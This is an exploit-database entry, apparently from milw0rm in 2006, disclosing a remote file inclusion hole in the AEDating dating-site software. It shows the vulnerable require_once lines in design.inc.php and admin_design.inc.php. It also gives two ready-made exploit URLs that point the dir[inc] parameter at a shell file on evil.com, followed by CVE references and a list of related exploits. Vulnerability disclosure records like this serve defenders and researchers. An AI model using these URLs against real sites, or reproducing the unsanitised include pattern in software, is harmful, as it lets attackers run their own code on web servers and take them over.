AEDating (all versions) Remote File inclusion. Vulnerable code: /inc/design.inc.php /inc/admin_design.inc.php require_once( "$dir[inc]db.inc.php" ); require_once( "$dir[inc]prof.inc.php" ); Exploit: http://site.com/[script_path]/inc/design.inc.php?dir[inc]=http://evil.com/shell.txt? http://site.com/[script_path]/inc/admin_design.inc.php?dir[inc]=http://evil.com/shell.txt ? Video: http://rapidshare.de/files/33316468/AEDating_SQL.rar.html http://www.megaupload.com/?d=O1W4DX97 # milw0rm.com [2006-09-16]
Related Exploits
Trying to match CVEs (1): CVE-2006-4870Trying to match OSVDBs (2): 28923, 28924
Other Possible E-DB Search Terms: aeDating 4.1, aeDating
Date | D | V | Title | Author |
---|---|---|---|---|
2005-09-15 |
![]() |
AEwebworks aeDating 3.2/4.0 - 'search_result.php' SQL Injection | alexsrb | |
2006-09-04 |
![]() |
FlashChat 4.5.7 - 'aedating4CMS.php' Remote File Inclusion | NeXtMaN |